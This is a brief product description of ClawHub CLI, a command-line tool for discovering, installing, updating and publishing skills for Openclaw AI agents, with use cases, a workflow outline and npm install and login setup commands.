What is ClawHub CLI?

ClawHub CLI serves as the primary bridge between your local environment and the central repository of Openclaw Skills. It empowers developers to extend their AI agents' capabilities on the fly by fetching new skills, maintaining version control, and contributing back to the ecosystem.

By standardizing how skills are discovered and deployed, it ensures that your agent configurations remain consistent and up-to-date. Whether you are searching for specialized tools or publishing your own innovations, this CLI provides the necessary infrastructure to manage the lifecycle of Openclaw Skills efficiently.

ClawHub CLI Use Cases

  • Discovering new Openclaw Skills for specific automation tasks through keyword search.
  • Installing specific versions of agent skills to ensure compatibility across different environments.
  • Keeping a local library of Openclaw Skills synchronized with the latest security and feature updates.
  • Publishing custom-developed skills to the public or private registries for community or team use.

How ClawHub CLI Works

  1. The user initiates a command via the CLI while ensuring the openclaw-agent utility is active in the background.
  2. For searches or installs, the CLI communicates with the ClawHub registry to identify and retrieve relevant Openclaw Skills.
  3. The tool manages the local file system by placing skill folders into a designated directory and tracking their metadata.
  4. During updates, the CLI performs hash-based matching to compare local files with the registry and performs upgrades where necessary.
  5. For publishing, the CLI packages local directories and pushes them to the registry using authenticated credentials.

ClawHub CLI Setup

Before using the CLI, ensure that the openclaw-agent is installed and running on your system.

Install the package globally via npm:

npm i -g clawhub

Verify your installation and authenticate for publishing capabilities:

clawhub login
clawhub whoami
